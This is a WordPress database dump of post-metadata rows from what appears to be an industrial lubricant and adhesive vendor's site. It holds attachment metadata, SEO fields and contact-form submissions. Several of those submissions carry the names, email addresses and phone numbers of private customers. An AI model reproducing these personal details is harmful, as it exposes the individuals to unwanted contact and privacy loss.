INSERT INTO `wp_postmeta` VALUES (33358, 3734, '_field_10', 'Custom Aerospace Machine'); 
INSERT INTO `wp_postmeta` VALUES (33359, 3734, '_field_2', 'PKerchner@customaerospacemachine.com'); 
INSERT INTO `wp_postmeta` VALUES (33360, 3734, '_field_8', '(321) 724-0127'); 
INSERT INTO `wp_postmeta` VALUES (33361, 3734, '_field_3', 'Good Afternoon,\r\nCustom Aerospace machine is updated their Supplier Profiles and would like to request your most current ISO or AS certification. We appreciate your prompt response to this request and Thank-You in advance.\r\nPamela Kerchner\r\nQuality Specialist\r\nPKerchner@customaerospacemachine.com \r\n'); 
INSERT INTO `wp_postmeta` VALUES (33362, 3734, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33363, 3734, '_sub_id', '3734'); 
INSERT INTO `wp_postmeta` VALUES (33364, 3735, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (33365, 3735, '_seq_num', '236'); 
INSERT INTO `wp_postmeta` VALUES (33366, 3735, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33367, 3735, '_field_12', 'Josie LaCoe'); 
INSERT INTO `wp_postmeta` VALUES (33368, 3735, '_field_13', 'SPIRIT Racing Systems'); 
INSERT INTO `wp_postmeta` VALUES (33369, 3735, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (33370, 3735, '_field_14', 'jlacoe@andrew.cmu.edu'); 
INSERT INTO `wp_postmeta` VALUES (33371, 3735, '_field_15', '(570) 445-7470'); 
INSERT INTO `wp_postmeta` VALUES (33372, 3735, '_field_16', 'Hi! \r\n\r\nI&#039;m a member of a student run gravity powered vehicle team at Carnegie Mellon University in Pittsburgh, PA. We are looking for a wet-layup epoxy for a carbon fiber vehicle build for this year and were wondering if you could recommend one of your products for this application.\r\n\r\nPlease feel free to contact me with any additional questions. \r\n\r\nBest,  \r\nJosie LaCoe'); 
INSERT INTO `wp_postmeta` VALUES (33373, 3735, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (33374, 3735, '_sub_id', '3735'); 
INSERT INTO `wp_postmeta` VALUES (33375, 3736, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33376, 3736, '_seq_num', '371'); 
INSERT INTO `wp_postmeta` VALUES (33377, 3736, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33378, 3736, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33379, 3736, '_field_1', 'Chad Force'); 
INSERT INTO `wp_postmeta` VALUES (33380, 3736, '_field_10', 'Porsche St Louis'); 
INSERT INTO `wp_postmeta` VALUES (33381, 3736, '_field_2', 'cforce@porschestlouis.com'); 
INSERT INTO `wp_postmeta` VALUES (33382, 3736, '_field_8', '(314) 312-1973'); 
INSERT INTO `wp_postmeta` VALUES (33383, 3736, '_field_3', 'Interested in placing a small order of MS-907 Two-Part Epoxy Adhesive or finding a local retailer.  Please advise.  Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (33384, 3736, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33385, 3736, '_sub_id', '3736'); 
INSERT INTO `wp_postmeta` VALUES (33386, 3737, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33387, 3737, '_seq_num', '372'); 
INSERT INTO `wp_postmeta` VALUES (33388, 3737, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33389, 3737, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33390, 3737, '_field_1', 'Ronald Molitor'); 
INSERT INTO `wp_postmeta` VALUES (33391, 3737, '_field_10', 'AirBorn'); 
INSERT INTO `wp_postmeta` VALUES (33392, 3737, '_field_2', 'molitorr@airborn.com'); 
INSERT INTO `wp_postmeta` VALUES (33393, 3737, '_field_8', '320-632-9231'); 
INSERT INTO `wp_postmeta` VALUES (33394, 3737, '_field_3', 'looking to get a price quote on some Krytox XHT-S grease in the small 2 oz tubes please.\r\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (33395, 3737, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33396, 3737, '_sub_id', '3737'); 
INSERT INTO `wp_postmeta` VALUES (33397, 3738, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33398, 3738, '_seq_num', '373'); 
INSERT INTO `wp_postmeta` VALUES (33399, 3738, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33400, 3738, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33401, 3738, '_field_1', 'PRIYA M'); 
INSERT INTO `wp_postmeta` VALUES (33402, 3738, '_field_10', 'UMAC AVIONICS PTE LIMITED'); 
INSERT INTO `wp_postmeta` VALUES (33403, 3738, '_field_2', 'tech@umacintl.com'); 
INSERT INTO `wp_postmeta` VALUES (33404, 3738, '_field_8', '(656) 846-4085'); 
INSERT INTO `wp_postmeta` VALUES (33405, 3738, '_field_3', 'Dear Joanna Saffo,\r\n\r\nWe require the specific item that matches with the part no.\r\n\r\nSl No	Part Number	Part Description	Qty	Your Price\r\n1	EC75-W-EP	PAINT FINISHING WHITE (0.5LTR/TIN)	6 LITRES	\r\n2	ALOCORM 1200	ALOCORM 1200 BRUSH LIQUID KIT (4.5LTR/TIN)	50 LITRES	\r\n3	LPS1	LUBRICANT (0.5LTR/TIN)	6 LITRES	\r\n4	242	LOCTITE (50ML/EACH)	12 EACH	\r\n5	PR 30B	CROMTECH PRIMER (0.5LTR/TIN)	6 LITRES	\r\n6	EA9394	LIQUID SHIM (0.5LTR/TIN)	6 LITRES	\r\n7	TRAFFIC WAX	RELEASE AGENT JOHNSONS WAX	6 TINS	\r\n8	BOELUBE 70302-12	LUBRICANT (4LTR/TIN)	44 LITRES	\r\n\r\nAlso confirm the below points\r\n1. Manufacturer Name.\r\n2. Will Manufacturer COC be provided?                                        \r\n3. MSDS -Please attach with the reply mail.\r\n4. Delivery lead time\r\n5. EX WORKS pick up point\r\n6. Currency quoted\r\n7. Items should have more than 80% shelf life at the time of shipment.\r\n8. IATA / Export packing charges if any:\r\n9. Certificate of Analysis(COA)\r\n10. The items shall be supplied in individual packs with complete life details mentioned on the each pack.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (33406, 3738, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33407, 3738, '_sub_id', '3738'); 
INSERT INTO `wp_postmeta` VALUES (33408, 3739, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33409, 3739, '_seq_num', '374'); 
INSERT INTO `wp_postmeta` VALUES (33410, 3739, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33411, 3739, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33412, 3739, '_field_1', 'jonathan burgy'); 
INSERT INTO `wp_postmeta` VALUES (33413, 3739, '_field_10', 'pittsburgh electrical insulation'); 
INSERT INTO `wp_postmeta` VALUES (33414, 3739, '_field_2', 'jb@peipittsburgh.com'); 
INSERT INTO `wp_postmeta` VALUES (33415, 3739, '_field_8', '(412) 462-6300'); 
INSERT INTO `wp_postmeta` VALUES (33416, 3739, '_field_3', 'I have a customer repairing circuit boards and would like to purchase some conformal coatings from us.  Can we purchase direct?\n\n thank you'); 
INSERT INTO `wp_postmeta` VALUES (33417, 3739, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33418, 3739, '_sub_id', '3739'); 
INSERT INTO `wp_postmeta` VALUES (33419, 3740, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33420, 3740, '_seq_num', '375'); 
INSERT INTO `wp_postmeta` VALUES (33421, 3740, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33422, 3740, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33423, 3740, '_field_1', 'Hitesh K Trivedi'); 
INSERT INTO `wp_postmeta` VALUES (33424, 3740, '_field_10', 'UES Inc'); 
INSERT INTO `wp_postmeta` VALUES (33425, 3740, '_field_2', 'hitesh.trivedi.ctr@us.af.mil'); 
INSERT INTO `wp_postmeta` VALUES (33426, 3740, '_field_8', '(937) 255-6457'); 
INSERT INTO `wp_postmeta` VALUES (33427, 3740, '_field_3', 'I am interested KRYTOX XHT series greases. \r\nWhere can I buy it? what is the smallest quantity I can purchase?  '); 
INSERT INTO `wp_postmeta` VALUES (33428, 3740, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33429, 3740, '_sub_id', '3740'); 
INSERT INTO `wp_postmeta` VALUES (33430, 3741, '_wp_attached_file', '2017/02/shutterstock_268397873.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33431, 3741, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/02/shutterstock_268397873.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_268397873-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_268397873-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_268397873-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_268397873-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_268397873-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_268397873-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_268397873-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33432, 3726, '_thumbnail_id', '3741'); 
INSERT INTO `wp_postmeta` VALUES (33434, 3726, '_yoast_wpseo_title', 'How Krytox Performance Lubricants Drive Savings & Productivity'); 
INSERT INTO `wp_postmeta` VALUES (33436, 3744, '_edit_lock', '1488375790:2'); 
INSERT INTO `wp_postmeta` VALUES (33437, 3744, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (33438, 3745, '_wp_attached_file', '2017/02/Krytox-Temperature-Comparison.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33439, 3745, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1718;s:6:"height";i:1040;s:4:"file";s:41:"2017/02/Krytox-Temperature-Comparison.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:41:"Krytox-Temperature-Comparison-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:41:"Krytox-Temperature-Comparison-800x484.jpg";s:5:"width";i:800;s:6:"height";i:484;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:41:"Krytox-Temperature-Comparison-768x465.jpg";s:5:"width";i:768;s:6:"height";i:465;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"Krytox-Temperature-Comparison-1600x969.jpg";s:5:"width";i:1600;s:6:"height";i:969;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:41:"Krytox-Temperature-Comparison-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:41:"Krytox-Temperature-Comparison-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:41:"Krytox-Temperature-Comparison-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:41:"Krytox-Temperature-Comparison-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"17";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33440, 3746, '_wp_attached_file', '2017/02/krytox-astm-grease-life-test.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33441, 3746, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1384;s:6:"height";i:1032;s:4:"file";s:40:"2017/02/krytox-astm-grease-life-test.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"krytox-astm-grease-life-test-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"krytox-astm-grease-life-test-800x597.jpg";s:5:"width";i:800;s:6:"height";i:597;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"krytox-astm-grease-life-test-768x573.jpg";s:5:"width";i:768;s:6:"height";i:573;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"krytox-astm-grease-life-test-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"krytox-astm-grease-life-test-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"krytox-astm-grease-life-test-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"krytox-astm-grease-life-test-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"18";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33442, 3747, '_wp_attached_file', '2017/02/krytox-vs-hydrocarbon.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33443, 3747, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1407;s:6:"height";i:873;s:4:"file";s:33:"2017/02/krytox-vs-hydrocarbon.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"krytox-vs-hydrocarbon-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"krytox-vs-hydrocarbon-800x496.jpg";s:5:"width";i:800;s:6:"height";i:496;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"krytox-vs-hydrocarbon-768x477.jpg";s:5:"width";i:768;s:6:"height";i:477;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"krytox-vs-hydrocarbon-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"krytox-vs-hydrocarbon-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"krytox-vs-hydrocarbon-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"krytox-vs-hydrocarbon-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33444, 3748, '_wp_attached_file', '2017/02/Industrial-Lubricants.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33445, 3748, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:417;s:4:"file";s:33:"2017/02/Industrial-Lubricants.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"Industrial-Lubricants-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"Industrial-Lubricants-800x334.jpg";s:5:"width";i:800;s:6:"height";i:334;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"Industrial-Lubricants-768x320.jpg";s:5:"width";i:768;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"Industrial-Lubricants-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"Industrial-Lubricants-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"Industrial-Lubricants-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"Industrial-Lubricants-510x417.jpg";s:5:"width";i:510;s:6:"height";i:417;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33446, 3744, '_thumbnail_id', '3748'); 
INSERT INTO `wp_postmeta` VALUES (33448, 3744, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (33449, 3744, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (33450, 3744, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (33451, 3744, '_yoast_wpseo_focuskw_text_input', 'Industrial Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (33452, 3744, '_yoast_wpseo_focuskw', 'Industrial Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (33453, 3744, '_yoast_wpseo_title', 'Industrial Lubricants That Can Reduce Production Downtime'); 
INSERT INTO `wp_postmeta` VALUES (33454, 3744, '_yoast_wpseo_metadesc', 'Proper industrial lubricants can have a immense effect on the manufacturing process allowing for reduced downtime and increased productivity.'); 
INSERT INTO `wp_postmeta` VALUES (33455, 3744, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (33456, 3744, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (33457, 3744, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (33459, 3744, '_yoast_wpseo_linkdex', '99'); 
INSERT INTO `wp_postmeta` VALUES (33461, 3753, '_edit_lock', '1488375739:2'); 
INSERT INTO `wp_postmeta` VALUES (33462, 3753, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (33463, 3754, '_wp_attached_file', '2017/02/krytox-lubricant-comparison.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33464, 3754, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2703;s:6:"height";i:1123;s:4:"file";s:39:"2017/02/krytox-lubricant-comparison.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-lubricant-comparison-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-lubricant-comparison-800x332.jpg";s:5:"width";i:800;s:6:"height";i:332;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-lubricant-comparison-768x319.jpg";s:5:"width";i:768;s:6:"height";i:319;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"krytox-lubricant-comparison-1600x665.jpg";s:5:"width";i:1600;s:6:"height";i:665;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-lubricant-comparison-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-lubricant-comparison-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-lubricant-comparison-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-lubricant-comparison-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"12";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33465, 3755, '_wp_attached_file', '2017/02/krytox-operating-costs.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33466, 3755, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2703;s:6:"height";i:966;s:4:"file";s:34:"2017/02/krytox-operating-costs.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-operating-costs-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-operating-costs-800x286.jpg";s:5:"width";i:800;s:6:"height";i:286;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-operating-costs-768x274.jpg";s:5:"width";i:768;s:6:"height";i:274;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"krytox-operating-costs-1600x572.jpg";s:5:"width";i:1600;s:6:"height";i:572;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-operating-costs-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-operating-costs-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-operating-costs-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-operating-costs-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"19";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33467, 3756, '_wp_attached_file', '2017/02/high-performance-lubricants.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33468, 3756, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:603;s:4:"file";s:39:"2017/02/high-performance-lubricants.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"high-performance-lubricants-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"high-performance-lubricants-800x482.jpg";s:5:"width";i:800;s:6:"height";i:482;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"high-performance-lubricants-768x463.jpg";s:5:"width";i:768;s:6:"height";i:463;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"high-performance-lubricants-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"high-performance-lubricants-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"high-performance-lubricants-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"high-performance-lubricants-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33469, 3753, '_thumbnail_id', '3756'); 
INSERT INTO `wp_postmeta` VALUES (33471, 3753, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (33472, 3753, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (33473, 3753, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (33474, 3753, '_yoast_wpseo_focuskw_text_input', 'High Performance Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (33475, 3753, '_yoast_wpseo_focuskw', 'High Performance Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (33476, 3753, '_yoast_wpseo_title', 'The Secret Competitive Advantage of High Performance Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (33477, 3753, '_yoast_wpseo_metadesc', 'High performance lubricants offer long lasting performance capabilities, despite harsh environmental conditions minimizing the risk of failures.'); 
